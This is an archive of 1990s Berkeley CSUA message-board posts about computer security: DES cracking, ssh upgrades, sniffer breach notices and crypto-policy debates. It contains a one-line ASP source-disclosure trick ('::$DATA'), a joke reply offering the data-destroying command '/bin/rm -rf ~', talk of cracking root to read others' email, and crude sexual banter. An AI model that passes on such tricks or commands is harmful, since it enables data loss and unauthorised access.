7/13 http://www.distributed.net/des crack the Data Encryption Standard using idle time on your computer, prove it's inadequate. \_ get a life. \_ Oh SURE . . . you say that now, but wait until 3:30 AM on that fine Sunday morning, when the black helicopters hover over your house, and the black ropes come out, and zombie Nazi mind-slaves (vat-grown by the UN) wearing black body armor rappel down them to burst through your front door and kill you and the wife and little Timmy, ALL BECAUSE THAT E-MAIL TO GRANDMA FLO AND GRANDPA MEL ABOUT LITTLE TIMMY'S SOCCER GAME LAST WEDNESDAY used WEAK DES ENCRYPTION . . . don't expect me to cry for you _then_. Bastard. \_ We don't work on Sundays. -Black Mask Man \_ Why do you not like announcements of techie stuff? This IS the "Computer Science" Undergraduate Association, is it not? \_ "using idle time on your computer [soda]".... \_ soda is not your computer \_ soda is our computer. keep this stupid crap off. crap off. It's already well known that DES is inadequate. It's been proved. This is nothing more than a GeekEgo thing. \_ Don't do that, then. \_ Think of it this way. You get $$$ if you personally break it. Of course, people who do CS only for that reason deserve to be shot. \_ That's not CS, it's CE. \_ It's not even CE. It's running a black-box program on your computer. \_ There are other reasons to do it money: curiosity, politics. \_ Is there a Cal team this time? -- yuen \_ Not unless I hear a lot of interest or unless the RC5 teams carry over. Or ask Trey (rhyde@uclink4) if he wants to take it over again. This contest is supposed to end in 9 days; it's not worth doing a lot of organizational work for something that's gone a week after you start. -- schoen, inheritor of UCB RC5 team contact |
1998/7/2-3 [Computer/SW/Security, Computer/SW/Languages/Web] UID:14289 Activity:nil |
7/2 Microsoft security flaw. "::$DATA" behind any asp code will allow you to read source code. \_ So? What about Microsoft isn't a security flaw? |
1998/6/18-23 [Computer/SW/Security] UID:14223 Activity:nil |
6/18 http://www.fbi.gov/foipa/ufo.htm -- the truth is out there... \_ http://home.att.net/~ixlez/inexufo1a.htm |
1998/6/12-16 [Computer/SW/Security] UID:14208 Activity:kinda low |
6/11 ssh 1.2.25 installed, to fix the crc checking security hole. The update broke hushlogin support; I hacked sshd to fix the problem for now (~mconst/pub/ssh/sshd-hushlogin-patch), and I'm sending a bug report out soon. Let me know if anything else goes wrong. --mconst \_ so *why* is the patch ifdef'd for only __FreeBSD__ when it looks like there's nothing OS dependent in it?? -ERic \_ My patch doesn't mention FreeBSD, it was already there -- the ssh-1.2.25 login_cap code is all in #ifdef __FreeBSD__ blocks. What broke is that under FreeBSD, sshd would ignore .hushlogin The problem was that under FreeBSD, sshd would ignore .hushlogin files and just look at login.conf. |
1998/6/4-8 [Computer/SW/Database, Computer/SW/Security, Computer/SW/Languages/Web] UID:14175 Activity:moderate |
6/4 Anyone have experience with http://best.com as web host provider? Good? Bad? Comparable alternatives? \_ Good. No comparable alternatives. -tom \_<DEAD>www.best.com/boxes/~indian<DEAD> \_ Best experience i've ever had with a web provider. They provide competent and beyond-the-call-of-duty technical support, FAQs, etc. -appel http://www.chaosium.com http://www.glorantha.com \_ I'm using it for two of my web sites (http://www.theil.com and http://www.docmisha.com and would definitely recommend it to other folks. Haven't had such a good experience with their tech support though. -genie \_ I plan on having several CGI scripts. They list a 1000cgi seconds/day. I highly doubt I'll reach that limit, but just so I have a reference, what type of program with how many uses per day would come close to hitting that quota? \_ run your CGI with "time foo.cgi" to see the amount of CPU time it takes. It's basically a non-issue unless you're grabbing nude pictures out of a database. -tom \_ Though wall-clock time on your system and wall-clock time on their system may be rather different. Is it an issue if you're grabbing pictures of clothed people from a DB? :-) \_ You're not charged for wall-clock time, you're charged for CPU time. They run boxes very similar to soda, so CPU time here should be comparable. It is unlikely that you'll get enough hits to matter if you're grabbing pictures of clothed people from a db. -tom |
1998/6/4-11 [Computer/SW/Security] UID:14171 Activity:nil 66%like:14387 |
6/3 ssh-1.2.23 installed, bugs to mconst. |
1998/5/21 [Computer/SW/Security] UID:14119 Activity:very high |
5/10 How does the root know what the sniffer logged??!?!? Hi. You are receiving this automated note because of a breakin to one of our machines. The intruder installed a sniffer and began logging passwords. Your password appeared in those logs. Therefore, you should change your password immediately. (If you use \_ and use SSH the same password on several machines, don't forget to change it on all of them!) \_ Because the sniffer logged to disk and root can read the disk. DUH! \_ Because the sniffer E-mailed the passwords to somebody else, and root happened to run across the list one day when they were reading everybody's E-mail looking for interesting stuff, silly. \_ Because you logged in during the period of time the sniffer was active. It's a good guess that your password was sniffed during that time. \_ "Appeared in" --> "we have a copy of, and we read". Not telepathy. \_ so why the love affair with ssh? besides telnet, aren't the pop3 and ftp ports also vulnerable? \_ that's like asking "why the love affair with helmets? aren't other body parts still vulnerable?" - protecting the most important/used parts is better than going completely unprotected \_ Yes, of course. That's why SSH supports port redirection, so that you can securely use unencrypted services. See the man page for ssh, options "-L" and "-R". SSH is more than just a telnet replacement... \_ Don't use pop3 and use scp where you'd use ftp (although ssh can encrypt ftp's authentication). --dim \_ Huh? \_ What's so hard about "don't use pop" or "use scp instead of ftp"? \_ It's super cool sysadmin magic. \_ cuz root *is* the sniffer! \_ no, root is the Kwisatz Haderach. |
1998/5/12-13 [Computer/SW/Unix, Computer/SW/Security, Academia/Berkeley/CSUA] UID:14090 Activity:low |
5/12 As long as all these new jobs are getting announced in /csua/pub/jobs, a small request for people to please CLEAN OUT all the old jobs that are no longer relevant. A number of postings there are owned by root because they were moved around. Those responsible for them, please let me know if they are still relevant or can be deleted. -lila \_ Princess Lila made a demand! All must comply. \_ "small request". \_ Ohhh. Ahh. |
1998/5/6 [Computer/SW/Security, Computer/SW/Unix] UID:14055 Activity:low |
5/5 From the MOTD on http://socrates.berkeley.edu: >On June 1, 1998 Communication and Network Services (CNS) will be >enhancing the Web access to the Campus Directories. At that time, >we will discontinue platform-specific Directory Services, such as >Unix fspb and Macintosh HyperPB, and gopher and telnet access to >Infocal. This will not affect telnet/host presenter access to >Socrates, > >If you have any questions, please send e-mail >to cpadmin@profile.berkeley.edu. \_Who cares? \_ _I_ care, dammit. Platform-specific directory users, I feel your pain . . . |
1998/4/17-18 [Computer/SW/Security, Computer/SW/Unix] UID:13980 Activity:high |
4/17 If I want to use ssh to connect to a remote machine and run xwin apps, what is the command line to start, say, xterm. And what do I need to set up beforehand? -emarkp \_ unix: /bin/rm -rf ~ windoze: fdisk mac: drag all your icons to the trash can. empty trash can. \_ Um, I assume this is a comment about the security? I though ssh was a secure way to transmit x-events. Furthermore, this does not answer the question. -emarkp \_ someone buy this man a clue \_ with a properly configured ssh, its all hidden 'silently' from you. ssh to the remote host and run your x commands normally SSH 'silently' sets your DISPLAY environment correctly for you, and your shell commands will inherit it. -ERic \_ Where can I go to find docs to do the setup correctly? Or is it simple enough to post here? -emarkp \_ Have you actually tried to run xterm already? If it didn't work, maybe you want to give the error mesg encountered. \_ The freeware 1.22 unix package had plenty of docs. RTFM. It isn't that hard. \_ well the 'default setup' works 'correctly'. If you have an idiot sysadmin who changed the defaults and put in things like disabling xforwarding in sshd config, then it won't work. -ERic |
1998/4/14 [Computer/SW/Security, Computer/SW/OS/Windows] UID:13950 Activity:high |
4/14 What's with the login uname? MS-DOS V3.3 ? Is this joke going to last forever? \_ It's no joke. We've secretly replaced soda with an MS-DOS machine (with Microsoft DOS/Connect for networking) and we were hoping no one would notice -- but damn it, you've spoiled everything. --root \_ MS-D0S???/? 1 CAN RUN K1NG"Z QU3ST 0N 1T!!!!1!!! BUT H0W DU 1 S3ND TH3 P1CTURZ 2 MY SKR33N?????? H3LP!!!1! \_ alias ver 'uname -a' \_ some perpetual April's Fools Joke \_ The best one so far, IMHO -muchandr \_ The joke's still there. jon@csua attaching his name as if he has done anything. |
1998/4/2 [Computer/SW/Security] UID:13893 Activity:nil |
4/1 What is the difference between a segmentation fault and a bus error? \_ segmentation is an address fault. you have attempted to access an invalid address or one you do not have permission to access. bus error is usually an aligment violation. attempting to access an int on a non-word boundary, for example. --aaron \_ But why is it called bus error? not alignment error? \_ It goes back to the days when Muni's schedule system was computerised. Due to boundary/alignment errors, they were sending all the busses on the same route at the same time. Thus, the bus error was created. |
1998/3/22-23 [Computer/SW/Security] UID:13849 Activity:high |
3/21 Ron Rivest is at it again: he's invented a technique to achieve message confidentiality with hash functions and no encryption, simple, intuitive, and completely non-export-controlled. http://theory.lcs.mit.edu/~rivest/chaffing.txt \_ note that he's just rephrased steganography to have a more dynamic method of mixing the message bits into another data stream, and he relies on message authentication to reject the superfluous data. old mechanical crypto systems in the 60s did stuff like that but filtered by using the same psuedo-random sequence as the sender. Rivest's method will require a good random generator at the sender (to permute packet order for the chaff). it will \_ why do you think that? my reading of his text didn't imply any packet order changes, just one or more chaff mesgs per valid packet. please mail me --oj \_ The packets go out in the same order, but you have to send chaff too, and the chaff has to be in an unpredictable order with respect to the wheat. If you always do wheat1-chaff1-chaff1 wheat2-chaff2-chaff2 wheat3-chaff3-chaff3 it's not hard to figure out where the wheat is. also probably make everybody's exportable authentication code get reclassified as munitions, now that someone's pointed out how it "really is encryption" (the way regulators think). --karlcz p.s. he also requires that the secret authentication key get transported by some other secure means (public-key encryption for those of us without exploding-attache-case couriers ;-). \_ I'm not too terribly impressed. As karlcz pointed out there's still this secret-key business thats required to create valid MACs and I'm not really psyched about the typical CSUA idiot adding 300 chaff packets per wheat packet to keep their email and porn URLs secret from "Them". The net is slogged enough as it is. What really needs to happen is to drop the ridiculous export controls. If I'm a terrorist or in the mafia, I _am_ going to \_ That was exactly Rivest's point, though. Obviously a block cipher is much more effective than chaffing, but it's currently in a very different political position. But Rivest's own conclusion is: "Mandating government access to all communications is not a viable alternative. The cryptography debate should proceed by mutual education and voluntary actions only." That goes for international controls as well as domestic. use the best possible encryption for all communications, and be damned the US law. Hello, duh, a terrorist or high powered mafioso is already going away for life. Going to add 3 months of consecutive time for an encryption export violation?!? \_ you miss the point. If encryption were export legal, then it'd be easy to market via consumer channels. Once that happens, you can pretty much kiss good-bye law enforcement's ability to wire-tap even the petty criminals. \_ So the point wasn't to make a decent and reasonable secure communications method, but was simply to snub law enforcement with a hacked end run? \_ Yeah, kinda looks that way. |
1998/2/17-18 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:13682 Activity:high |
02/16 In Apache, when I use .htaccess, how do I "log-off" from a browser? Thanks. \_ You're not "logged on" in the first place; http connections are stateless. If the browser decides to store the username and password, that's the browser's business. \_ Okay then, how do I make the browser not use the username and password during HTTP transaction then? \_ Restart the browser or get one that lets you clear stored passwords \_ Restart-- you mean quit and start again? Sheesh \_ Yep - sucks don't it? \_ Yep. Sucks don't it? \_ It's totally browser-dependent. Once Netscape /------------------/ Once Netscape releases the source, expect the days to look like the 80's when people have to deal with DOS 2.0/3.0/MSDOS/Windows 2.0/OS2 Geoworks OS incompatibility, not mentioning incompatibilities between MSWord/WordPerfect/WordStar/AmiPro/Lotus/blah blah blah. Proliferation of many different warez means happiness and perhaps some creativity but it also means a lot of headache for the end users. Are the average American Joe sophisticated enough that they can handle so many different platforms with different HTML standards, plug-ins, c00l features, this and that, or they just want a simple burger that satisfies their stomach? What do the dumb average American Joes want? releases the source you could make a "forget passwords" button or something. \_ Seriously doubt Joe User is going to d/l a hacked up copy of NS from http://www.butchery.org They're going to go to netscape, as always, and d/l the version made available by the NS people. The NS version is going to be a "best-of-the-net" browser. Or so says \_ Dronage deleted. For your reference, it said: "\_ Next drone deletion means deletion of entire motd. Watch it u nazi." NS. \_ so? what does this have to do with the above? "You have been warned" NS. \_ So? What does this have to do with anything? \_ It has to do with a large piece of text that was deleted. |
1998/2/13-14 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:13664 Activity:moderate |
2/12 Last month, the Clinton Administration announced that it will spend $28 million to retrain workers, create an Internet jobs bazaar and try to convince kids that the computer sciences are cool. The p.-r. blitz will include public service videos starring Jimmy Smits, tough-guy star of the television cop show NYPD Blue. \_ Isn't CS61A full enough already? \_ Not enough potstickers to go around anymore? \_ Oh good.. flood the industry with idiots and marginalize all of us. \_ The CS61A undergraduate teaching assistant industry? \_ WONDERFUL. More Microsoft-like people writing more code, and now applications will crash way more than ever. I remember the good 'ol days of text applications with DOS and apps just don't crash the way they do now. Microsoft/Netscape are two fine examples. |
1998/2/4-5 [Computer/SW/Security] UID:13623 Activity:high |
2/4 I have an obsession to crack root to read people's emails. Is that normal? \_ yes \_ ask marco \_ How would you do it on shadowed systems? \_ The Shadow knows.... \_ <DEAD>www.rootshell.com<DEAD> \_ Don't bother. As a sysadmin who has had real work reasons to read mail files over the years, I can assure you that no one's mail is worth reading, much less the effort required to acquire the access to do so. \_ but you get some good jokes sometimes... |
1998/2/2-3 [Computer/SW/Security] UID:13608 Activity:moderate |
2/2 If you've experienced frequent lost of connection to soda it's because you turned on your wall (wallall y). Try turn them off and tail the wall log instead (tail -f) and see if that improves the reliability for you. \_ Do you have any basis for this statement at all? \_ Trust me on this one. \_ So you're saying that wallall affects my packets not being able to get through some router btwn my ISP and UCB? Wow. \_ Yeah, didn't you read the CERT advisory of April 1, 1997, "wallall Denial of Service Attack"? \_ Wall is more than just a program; it is a way of life. \_ Beware The Wall. We don't need no education. |
1998/2/2-3 [Computer/SW/Security, Computer/SW/Languages/Misc, Computer/SW/Unix] UID:13607 Activity:high |
2/1 What is the easiest way to allow people (actually myself) to upload stuff through my web page? --- clueless \_ DON'T DO IT. \_ This may open you up to a lot of security risks; think carefully when you implement something. How do you want to do it? Do you want to enter text into a form and then have it available as a file in an account somewhere? \_ Don't listen to these idiots. The easiest way is probably HTTP PUT; see the Apache documentation. \_ Oh really? So where's a page you wrote that allows uploads? Post the URL so we can all have fun hacking it. \_ Why don't you just tell us how to hack HTTP PUT. \_ "There are few scripts available which implement PUT handling securely." _Apache Week_, April 4 1997 In concept it _can_ be secure, but it's not an unrealistic concern; frequently the PUT scripts have holes, even more than other CGI stuff. \_ PUT is fairly simple; it is not difficult to write a secure PUT script. You don't need "many" scripts available which implement PUT securely, you only need one. \_ right, but first you've got to find it. :-) \_ If you use suexec, it's not hard to write one. Just make all paths relative to the document root and disallow ".." and other funky characters. \_ YES! suexec is much more secure! We really should run httpd on soda instead of scotch so that one will not be able to kill the "nobody" process arbitrarily. \_ I'm still waiting to see your secure page. Post the URL when you're ready. \_ Oh, give it up. \_ thanks for all your responses. I wanted to do this as a way to replace ftp to transfer my manifestos:-). The web server is going to be running only when I need to transfer file and is shut down the moment the transfer is done. So I guess it does not need to be too secure. Anyway, the question is now whether I will get enough clue to find out how to write a minimal script. -- clueless \_ You must be too sexy to use scp. \_ No, Jobs is too sexy to have scp developed for mac. |
1998/1/21-22 [Computer/SW/Security] UID:13541 Activity:very high |
1/21 ssh versions through 1.2.21 have security hole in ssh-agent - upgrade to 1.2.22 or stop using ssh agent until you do. \_ Uh oh... you mean people will be able to snoop my incredibly sensitive private email and see what porn I'm downloading? Help! Help! The sky is falling! \_ Any URL? \_ for the porn? \_ See: http://www.cs.hut.fi/ssh-archive/messages/980121-145129-28265 -dim \_ Once again, is there an URL confirming this? \_ http://www.cs.hut.fi/ssh-archive/messages/980121-145129-28265 \_ Just read the freaking ssh 1.2.22 release notes or comp.security.ssh |
1997/11/19 [Computer/SW/Security] UID:32164 Activity:nil |
11/18 Has anyone had trouble getting xlock to work with shadow passwords? How do I get around it not knowing where to look for the passwords? Having it setuid does not work. -John \_ Hmm, I managed to get version 4.01 to work with shadow passwds. Maksure that on top of making the binary setuid that the binary is owned by root. -- marc \_ /usr/openwin/bin/xlock works fine with shadow passwords. |
1997/5/2-15 [Computer/SW/Security, Computer/SW/Unix] UID:32134 Activity:nil |
4/25 Every new account on soda comes with a file called "FAQ". (If you lost your copy, a fresh one is always available in /usr/local/csua/FAQ .) Please read it and remember it when you have questions/problems. Asking root questions that it answers is grounds for getting really snide or obnoxious responses from root, if your mail is answered at all. |
1997/4/25 [Computer/SW/Security, Computer/SW/Unix] UID:32127 Activity:nil |
4/17 If you ever have problems logging into soda, please check the http://ucb.org.csua newsgroup for announcements of system problems before mailing root. If there is a system problem, mailing root just fills root's mail spool once it's fixed and too late to do anything about it. This and other useful information was in the FAQ file in your account when it was created. Please read it and remember it - if you lost your copy, a fresh one is always available in /usr/local/csua/FAQ. Asking root questions that it answers is grounds for getting really snide or obnoxious responses from root. |
1997/1/29 [Computer/SW/Security, Computer/SW/OS/Windows] UID:32049 Activity:nil |
1/29 I bought a new HD, 4 gig, and I'd like to move everything from my old 1 gig to the 4 gig (4 gig = primary, 1 gig = secondary). Where can I find a good DOS backup utility that does this? Thanks. \_ DOS Tar's good \_ No, it doesn't do long name (8+ char), STUPID \_ what's wrong with copy /s d:\ c:\c_drive ? |
1996/10/29 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:31974 Activity:nil |
10/28 The San Francisco Book Festival's this weekend, if anyone's interested... it's generally lots of fun -- interesting authors, poets, book crafts, etc. More information's at http://www.sfbook.org There's generally a nominal admission charge, unfortunately. --tabloyd \_ youll pay hundreds for dorky computer equipment which will be worth half its value in 6 months, but you complain about a "nominal" admissions charge to a book festival... :) \_You should hear me complain about computer equipment (which we hardly ever buy anyway!). But I just thought people should be aware that there is an admission fee -- you also have to pay to buy any books, unlike at the ABA, where it's all free. --tabloyd \_ fair enough! :) |
1996/10/29 [Computer/SW/Security, Computer/SW/WWW/Server, Computer/SW/Unix] UID:31973 Activity:nil |
10/28 Why aren't the web server logs mounted on soda? People do like to see who is accessing their web pages. \_ Try mailing root and asking them. Most likely it's just something no one's bothered to do yet as part of the changeover. \_ I'll let you serve my logs baby \_ I wanna see who's accessing your web pages, too... |
1996/10/28-11/4 [Computer/SW/Security] UID:31953 Activity:nil |
10/24 IMPORTANT! A sniffer was caught using one of the Cory Hall machines to get passwords to accounts on soda. He sniffed net connections from the 240 subnet to soda and elsewhere. Please change your password if there's any chance your account was compromised! |
1996/6/5 [Computer/SW/Security, Computer/SW] UID:31849 Activity:nil |
6/3 Anyone know how i can change my local address with Sproul over the Web? I know they have a page for address change form... anyone know what it is? \_ I think that you can only do it from their Bear Facts macs that are scattered across campus. - sagarwal \_ http://registrar.berkeley.edu:4202/BearFacts.html \_ You'd think they coulda spared a couple of IP addresses or something to give it it's own host/virtual host ... \_Actually DCNS is rather short of IP addresses and would rather not have to go buy another block from BBN/Planet until they absolutely have to, as the cost of them is going way up now that it's for-profit BBN and not the non-profit BARRnet running the connections Besides, why bother for a server that just says "Web access coming soon"? \_ They promised to make it accessible via WWW from any (campus ?) host but don't bet on it... \_ I would - the campus is pushing to get everything on the web - less headaches for them that way |
1996/6/5 [Computer/SW/Security] UID:31846 Activity:nil |
6/4 PLEASE OH PLEASE mount scotch! Last time I edited my web page, I didn't have a beard, and Menudo were still in style. \_ it doesn't matter much since no one can access it anyway. be patient and someday scotch will be fixed. \_ I just want to be able to ftp my files onto UCSEE's web server so then people CAN access it. Please mount it just so that we can remove our files. \_ We are not going to mount it until scotch is stable. As has been mentioned before, if you really really really need your files, mail root and someone will get them for you and plop them down on soda. -lila \_ How about hacking up a ftpd that allows non-anonymous access to scotch to update files? I could put together such a beast... -ERic |
1995/3/1 [Computer/SW/Security, Computer/SW/Unix] UID:31773 Activity:nil |
3/1 Anyone knows where on campus can I find Xterminals to login directly to Soda without a facilities/departmental login? \_ yes. \_ what a jerk giving these smart ass remarks. \_ fuck you. if you want nice friendly advice, get off soda. \_ i won't give you the pleasure you nerd. you can't get any. :P -word2yomomma! \_ 343 soda has some xterminals you can use for this, and probably the machines in the lounge across the hall also. help@soda is generally more cheerful about giving answers. --PeterM \_ Where is the lounge located exactly and are the machines there color terms? What are the hours for the lounge and 343? \_ that _jerk_ can learn something from PeterM. - dookie |
1995/3/1-6 [Computer/SW/Security] UID:31768 Activity:nil |
2/18 CHANGE YOUR PASSWORD! Someone has been snooping the net for passwords, and apparently got rather a lot of them. |
1995/3/1-4 [Computer/SW/Security, Computer/SW/Unix] UID:31767 Activity:nil |
2/21 If you would like your account moved to /usr10, mail root. /usr10 has lots of space, but has been known to crash. |
1995/2/9-11 [Computer/SW/Security] UID:31753 Activity:high |
2/9 on-line service surfer wanted for about 10 hours of work. send mail to hh@xcf if you're interested. you must have familiarty with and access to prodigy, aol, and compuserve. _,.-----.,_ ,-~ ~-. ,^___ ___^. /~" ~" . "~ "~\ Y ,--._ I _.--. Y | Y ~-. | .-~ Y | | | }:{ | | j ! / | \ ! l .-~ (__,.--" .^. "--.,__) ~-. ( / / | \ \ ) \.____, ~ \/"\/ ~ .____,/ ^.____ ____.^ | |T ~\ ! ! /~ T| | | |l _ _ _ _ _ !| | | l \/V V V V V V\/ j | l \ \|_|_|_|_|_|/ / ! \ \[T T T T T T]/ / \ `^-^-^-^-^-^' / \ / \. ,/ "^-.___.-^" You're dead. |
1995/2/9 [Computer/SW/Security, Computer/SW/Unix] UID:31748 Activity:nil |
2/9 Theodore == multiple login from different annex boxes man. Can we turn off the little fuckers account now? \_that is fucker's ... where is your grammar boy? \_ that should be "grammar, boy", as it is unlikely that you are talking about a child schooled in English who goes around explaining mistakes. \_ he was just being obtuse. he really meant: "... where is your aaron" theodore ttyrn annex-64-1.Berke Thu Feb 9 03:03 - 03:25 (00:22) theodore ttyri annex-64-1.Berke Thu Feb 9 02:58 - 09:40 (06:42) theodore ttypC annex136-4.Berke Thu Feb 9 01:04 still logged in theodore ttyrY annex136-4.Berke Thu Feb 9 00:40 - 02:57 (02:16) |
1995/1/21 [Computer/SW/Security, Computer/SW/Unix, Health/Women] UID:31725 Activity:nil |
1/20 Do not ask to be blown by root. Rumours of us rendering such favors to account holders are highly exaggerated. \_ Blow me. \_ mail whoeveryouare < prostitute \_ Rumor not exaggerated, but we need more women on CSUA staff. / \_ This isn't the way to get them... | \_ It's a better way to scare them off. \_ this pungent tang of feminism confirms a musing I had about how a feminist with insight is not a feminist at all, but I won't get into it here. \_ What makes you think this display of tast and maturity only disgusts women? \_ I'm sure that's the intent, o wise visionary. \_ Men give *way* better head than women. \_ You just haven't met the right women. Or maybe you've just met exceptional men. \_ You obviously don't understand what I am talking about. \_ Rumor has it that ali gives good head. \_ not as good as partha (sorry, ali) \_ With a name like Banerjee, you know it has to be good |
1994/11/11-1995/1/5 [Computer/SW/Security, Computer/SW/Unix] UID:31649 Activity:kinda low |
1/5 WWW is now setup on soda. If you want to setup your own home page, cd in /www/<first letter of your login>/<your login name>/public_html and put your files there. If you do not have a directory in /www/, run /usr/local/adm/bin/makeme. |
1994/4/28 [Computer/SW/Security, Computer/SW/Unix] UID:31578 Activity:nil |
4/27 Someone has a 2.5-megabyte core file in /tmp which has been sitting around since 4/26. Now *I* can't read news because the filesystem's full. Why can't people be even slightly considerate? \_ This is soda, that's why. Nobody gives a shit about what's in /tmp and so they don't delete it 'cause it's gonna get nuked eventually. How often does the /tmp sweeper go through anyway? \_ Every week or so -- not nearly often enough. Maybe we should have /tmp quotas too. Say 1 meg soft, 10 megs hard or something like that. \-that is a stupid idea. look files have names attached to them ... just mail the person with a lot of old shit and tell them to delete it. cc: root if you want and if someone is incessantly a bozo, then root can send something stronger. \_ Something stronger you want? Hmm...how about a little chsh or passwd gift? Or maybe just an rm -r on the hoser's acct. \_ You twinks, /tmp is cleared of stuff not accessed in 3 days every night. Get a clue. |
1994/4/11 [Computer/SW/Security, Computer/SW/Unix] UID:31558 Activity:nil |
4/10 Still looking for a machine that doesn't crash. Mail me - root |
1994/3/20-4/28 [Computer/SW/Security] UID:31531 Activity:moderate |
1/22 Politburo meetings are Fridays at noon in 238 Evans Hall. ***UNOFFICIAL MESSAGES BELOW*** +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ F O R O F F I C I A L U S E O N L Y W A R N I N G YOU HAVE REACHED A U.S. GOVERNMENT COMPUTER OR DATA BASE, USED SOLELY BY THE U.S. GOVERNMENT, ITS OFFICERS, AND AGENTS. IT IS A VIOLATION OF UNITED STATES CODE, TITLE I8, TO ACCESS AND USE U.S. GOVERNMENT COMPUTER RESOURCES WITHOUT SPECIFIC AUTHORIZATION. EACH ACCESS IS SUBJECT TO RECORDING AND AUDITING. WITHOUT SPECIFIC AUTHORIZATION FROM THE U.S. GOVERNMENT, YOU ARE AN INTRUDER. INTRUDERS ARE SUBJECT TO CRIMINAL PROSECUTION, FINE, AND/OR IMPRISONMENT. *********************************************************************** ***COMMUNICATIONS SECURITY MONITORING NOTIFICATION*** THE USE OF YOUR E-MAIL TERMINAL CONSTITUES CONSENT TO COMMUNICATIONS SECURITY MONITORING *********************************************************************** FOR ASSISTANCE CONTACT COMMUNITY SERVICES CENTER TELEPHONE: (DSN) (510) 642-7453 E-MAIL: Surveilance@soda.berkeley.edu |
1994/3/6 [Science, Computer/SW/Security] UID:31503 Activity:nil |
3/6 New cryptology advance renders DES _insecure_. Read sci.crypt for more info. Basically a machine like soda can break a 10 char crypt in about 8 hours. This has SERIOUS security ramifications. \_This technology is not that new. The U.S. government has not allowed DES for use with classified documents for years. This would imply that the government has cracked DES long ago. If the civilian population has been able to crack it too, I would not be surprised. \_Yeah, and I've got a bridge I'd like to sell you, ya twink. \_Nice try. \_ Actually, I'm not the owner of the account of the person who wrote this. I broke into his account using the new super-duper technology fu thingy. \_ DES never was secure. They've had DES-cracking LSI chips for at least a year that simply do an exhaustive search of the key-space really fast. |
1994/2/22 [Computer/SW/Security] UID:31494 Activity:nil |
2/21 Read ~boss/Clipper for info on the clipper chip, and for a chance to add your name to a petition against it. \_ The issue of whether the government has a legal right to monitor communications (with the proper search warrant) is clouded and ignored by bandying about terms like "big brother" and "facist." It's ludicrous to think that the government will monitor *more* communications if Clipper passes. \_ It's not ludicrous at all. Monitoring resources are costly. If Clipper is easier -- cheaper -- to monitor than alternative technologies, than the government can listen in more than they would otherwise. Even totalitarians are subject to economics... \_ Encryption now: none. Ease of tapping: easy. Encryption with Clipper: some. Ease of tapping: Less. This isn't brain surgery. The government isn't asking for anything it doesn't already have. Deal with the real issues instead of fear-mongering. \_ In addition, clipper will fool people into thinking they're safe when they aren't...so communications that were thought too important to trust to the net before will become open to the government. \_ Not without a search warrant. \_ No, Clipper will fool *stupid* people into thinking they're safe. There's a difference. \_ It could be argues that Clipper provides increased privacy since it gives cell phone makers, etc. free encryption with no r&d costs. I'd prefer knowing the line was secure from everyone buty the cops than open to anyone who knows what frequency to listen in on... \_ You're assuming that this wonderful algorithm that the NSA came up with is a good one. Since it's so secret, it could be total bullshit for all anyone knows...although far be it for me to imply that the government is somehow able to make mistakes... \_ With the incredibly quick advances in technology, nothing is secure for more than a decade or two. |
1993/12/10 [Computer/SW/Security, Computer/SW/Unix] UID:31434 Activity:nil |
12/8 Apparently some idiot is going around calling soda users, telling them he's root@soda and that he needs their current password. root@soda would never do this, and if you're stupid enough to be duped by this guy, your account will be shut off. |
1993/10/11 [Computer/SW/Security] UID:31413 Activity:nil |
10/10 Is leaving pgp on soda a good idea? the physical control of the private key is lost when you leave it on soda... -curious hoding \_ You can leave your public keyring here and use PGP via various add-ins for EMACS, Elm, and mail. Then you can download any messages and decode them at home. That's only if you're paranoid though. You can just as easily just take permissions off the file and it will pretty safe for casual use. |
1993/5/26-28 [Computer/SW/Security, Industry/Jobs] UID:31330 Activity:nil |
5/19 Berkeley Systems, Inc (makers of the AfterDark screen saver) is looking for a full-time assistant in their Access products group -- products to make computers accessable by vision-impaired users. Complete details in ~dwallach/bsi.job |
1993/5/26 [Computer/SW/Unix, Computer/SW/Security, Computer/Networking] UID:31325 Activity:nil |
5/24 Anybody know of an annex port in the Los Angeles area (818 area) that would allow me to connect to Berkeley computers? kmanoj \_ dunno, but netcom has a Point Of Presence in LA area somewheres, if it's local to you it'll only be 17.50/mo, and you can use it in the bay area also.... \_ How about numbers for UCLA, USC, or CSUN annex ports? Anybody have those? forget it bud. even if you have those numbers, the annex port is like berkeley's, won't let you connect outside its system \_ I've heard that the annex port at CalTech allows you to telnet out, but you need the IP address for whatever machine. Sorry, don't know the phone number. -jesse \_ Okay, here's the story boys and girls. Connect up to a CSU server that's local to you. There's one in Northridge at (818) 701-0478; one in Los Alamos at (310) 985-9540. From there, open a connection to SF State with "sf/40" (port 40). Then do a "connect <your-favorite-MUD>" command, and you're there! Connection's kinda slow; but hey, it's semi-free! (Dunno about legality, so use at your own risk!) I also have those CalTech numbers, so mail me if you want 'em -jctwu \_ I've warned them of this security hole and it will shortly be turned off. |
1993/4/18 [Computer/SW/Security, Computer/SW/Unix] UID:31274 Activity:nil |
4/17 /usr/local/csua is a goddamn mess, as is the life file. Some root hoser should clean it up instead of looking for ``criminals''... |
11/27 |